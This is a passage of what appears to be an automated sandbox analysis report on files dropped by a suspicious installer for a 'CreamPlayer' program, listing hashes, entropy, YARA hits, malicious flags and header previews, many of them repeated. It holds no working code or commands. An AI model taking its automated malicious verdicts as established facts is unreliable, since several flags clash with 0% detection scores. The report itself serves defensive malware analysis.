                                                                                                  Entropy (8bit):6.4472652154517345
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:Fs7u3JL96d15Y2BmKh678IuYAhN3YCjlgiZioXyLWvCe93rZ5WZOlUmpNJ5mlbb/:e7WJL96d15Y2BmKh678IuYAhN3YCjlgw
                                                                                                  MD5:752CA72DE243F44AF2ED3FF023EF826E
                                                                                                  SHA1:7B508F6B72BD270A861B368EC9FE4BF55D8D472F
                                                                                                  SHA-256:F8196F03F8CBED87A92BA5C1207A9063D4EEBB0C22CA88A279F1AE1B1F1B8196
                                                                                                  SHA-512:4E5A7242C25D4BBF9087F813D4BF057432271A0F08580DA8C894B7C290DE9E0CF640F6F616B0B6C6CAD14DC0AFDD2697D2855BA4070270824540BAE835FE8C4A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..=...........!................`;.......................................P.......................'..............p...o.......d.... .......................0..\.......................................................4............................text...k........................... ..`.rdata..............................@..@.data....9.......0..................@....idata..............................@....rsrc........ ......................@..@.reloc..T....0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:MS Windows HtmlHelp Data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):78183
                                                                                                  Entropy (8bit):7.692742945771669
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                                                  MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                                                  SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                                                  SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                                                  SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                                                  Malicious:false
                                                                                                  Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):176128
                                                                                                  Entropy (8bit):6.204917493416147
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                                                  MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                                                  SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                                                  SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                                                  SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:modified
                                                                                                  Size (bytes):4668655
                                                                                                  Entropy (8bit):6.651425624514438
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:Zejussm5VOWiN0WcZR989Awg5t6VVa0/WXD6JB3F:07Z5QV3c8AEa0/WXD6JtF
                                                                                                  MD5:A3E56DEA396FF196EFE4C3E60B998E88
                                                                                                  SHA1:2B764B543F242F8D57F7BDB04D91227F3C0590D8
                                                                                                  SHA-256:622A75B5D62939B7E2385B7D35B49D6E3E50D582452A9225F7D61F62C4FC8BD8
                                                                                                  SHA-512:ECCA0AB8D89F473AFD4CC2676917EB0CC9BCD9A8227654E161D99A034AEB14636CF908BF2C7C4C635948D3A943415E4C2DCCF2580D941E519DC1E9C3152371A9
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...^.\g.....................t.......M............@...........................G.......G..............................................@..................................................................................4............................aett3..J........................... ..`.aftt3..t...........................@..@.agtt3...d.......0..................@....rsrc........@......................@..@.ahtt3...h...@)..f....(.............`.,.........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1645320
                                                                                                  Entropy (8bit):6.787752063353702
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                                                  MD5:871C903A90C45CA08A9D42803916C3F7
                                                                                                  SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                                                  SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                                                  SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):265728
                                                                                                  Entropy (8bit):6.4472652154517345
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:Fs7u3JL96d15Y2BmKh678IuYAhN3YCjlgiZioXyLWvCe93rZ5WZOlUmpNJ5mlbb/:e7WJL96d15Y2BmKh678IuYAhN3YCjlgw
                                                                                                  MD5:752CA72DE243F44AF2ED3FF023EF826E
                                                                                                  SHA1:7B508F6B72BD270A861B368EC9FE4BF55D8D472F
                                                                                                  SHA-256:F8196F03F8CBED87A92BA5C1207A9063D4EEBB0C22CA88A279F1AE1B1F1B8196
                                                                                                  SHA-512:4E5A7242C25D4BBF9087F813D4BF057432271A0F08580DA8C894B7C290DE9E0CF640F6F616B0B6C6CAD14DC0AFDD2697D2855BA4070270824540BAE835FE8C4A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..=...........!................`;.......................................P.......................'..............p...o.......d.... .......................0..\.......................................................4............................text...k........................... ..`.rdata..............................@..@.data....9.......0..................@....idata..............................@....rsrc........ ......................@..@.reloc..T....0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):348160
                                                                                                  Entropy (8bit):6.542655141037356
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                                                  MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                                                  SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                                                  SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                                                  SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):499712
                                                                                                  Entropy (8bit):6.414789978441117
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                                                  MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                                                  SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                                                  SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                                                  SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):176128
                                                                                                  Entropy (8bit):6.204917493416147
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                                                  MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                                                  SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                                                  SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                                                  SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1645320
                                                                                                  Entropy (8bit):6.787752063353702
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                                                  MD5:871C903A90C45CA08A9D42803916C3F7
                                                                                                  SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                                                  SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                                                  SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4668655
                                                                                                  Entropy (8bit):6.651425418502328
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:uejussm5VOWiN0WcZR989Awg5t6VVa0/WXD6JB3F:H7Z5QV3c8AEa0/WXD6JtF
                                                                                                  MD5:77F7E9BB09981D650745FD07B22494F2
                                                                                                  SHA1:63EF8FA5BC0CDE86756696878D581B3EB048B194
                                                                                                  SHA-256:62B1ED66AFBFC5AD8AE43967C17FD425AD4F3E35F781541BB60ECEE43616BCA8
                                                                                                  SHA-512:553EC83E65F2756C6715DA1122C0744D390DB39DE87606986877537086CDA1A7F5ED1E6DB3FDE269F995EB0A5594DC879358DAE1F7AA2D7366D36124CE4B35F4
                                                                                                  Malicious:false
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-JIRG1.tmp, Author: Joe Security
                                                                                                  Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...^.\g.....................t.......M............@...........................G.......G..............................................@..................................................................................4............................aett3..J........................... ..`.aftt3..t...........................@..@.agtt3...d.......0..................@....rsrc........@......................@..@.ahtt3...h...@)..f....(.............`.,.........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):645592
                                                                                                  Entropy (8bit):6.50414583238337
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                  MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                  SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                  SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                  SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:MS Windows HtmlHelp Data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):78183
                                                                                                  Entropy (8bit):7.692742945771669
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                                                  MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                                                  SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                                                  SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                                                  SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                                                  Malicious:false
                                                                                                  Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):445440
                                                                                                  Entropy (8bit):6.439135831549689
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:sosmML3+OytpWFkCU1wayvT33iiDNmAE27R9sY9kP0O+:soslvJ3RaY9wU
                                                                                                  MD5:CAC7E17311797C5471733638C0DC1F01
                                                                                                  SHA1:58E0BD1B63525A2955439CB9BE3431CEA7FF1121
                                                                                                  SHA-256:19248357ED7CFF72DEAD18B5743BF66C61438D68374BDA59E3B9D444C6F8F505
                                                                                                  SHA-512:A677319AC8A2096D95FFC69F22810BD4F083F6BF55B8A77F20D8FB8EE01F2FEE619CE318D1F55C392A8F3A4D635D9285712E2C572E62997014641C36EDC060A2
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..=...........!.........\......@!....................................... .......................'..........................P.......H.......................l....................................................................................text............................... ..`.rdata..2$.......&..................@..@.data...............................@....idata..............................@....rsrc...H...........................@..@.reloc...&.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):445440
                                                                                                  Entropy (8bit):6.439135831549689
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:sosmML3+OytpWFkCU1wayvT33iiDNmAE27R9sY9kP0O+:soslvJ3RaY9wU
                                                                                                  MD5:CAC7E17311797C5471733638C0DC1F01
                                                                                                  SHA1:58E0BD1B63525A2955439CB9BE3431CEA7FF1121
                                                                                                  SHA-256:19248357ED7CFF72DEAD18B5743BF66C61438D68374BDA59E3B9D444C6F8F505
                                                                                                  SHA-512:A677319AC8A2096D95FFC69F22810BD4F083F6BF55B8A77F20D8FB8EE01F2FEE619CE318D1F55C392A8F3A4D635D9285712E2C572E62997014641C36EDC060A2
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..=...........!.........\......@!....................................... .......................'..........................P.......H.......................l....................................................................................text............................... ..`.rdata..2$.......&..................@..@.data...............................@....idata..............................@....rsrc...H...........................@..@.reloc...&.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):499712
                                                                                                  Entropy (8bit):6.414789978441117
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                                                  MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                                                  SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                                                  SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                                                  SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):348160
                                                                                                  Entropy (8bit):6.542655141037356
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                                                  MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                                                  SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                                                  SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                                                  SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):645592
                                                                                                  Entropy (8bit):6.50414583238337
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                  MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                  SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                  SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                  SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):717985
                                                                                                  Entropy (8bit):6.51490048494207
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:6TPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+NIq5MRxyFi:SPcYn5c/rPx37/zHBA6pFptZ1CE0qMRj
                                                                                                  MD5:56C3FA3352F751693DFC2275199FDE56
                                                                                                  SHA1:0C0D8556192FA79ADCACB4E0750C7310C91822F3
                                                                                                  SHA-256:7ADDEC9CDB89247B9BA11D6BA094C3C857D1D7B08A7FB7335593B9D0CC75E827
                                                                                                  SHA-512:210D4418410F07208EF0DBAE8EA10F6284EA0B8F445BB12CD2B1AF22F48E9FC7D18F21A5F9FCAE997B2BCDB5EE0D371AB59EFE8912C28789F0BF83DE84D5F4F2
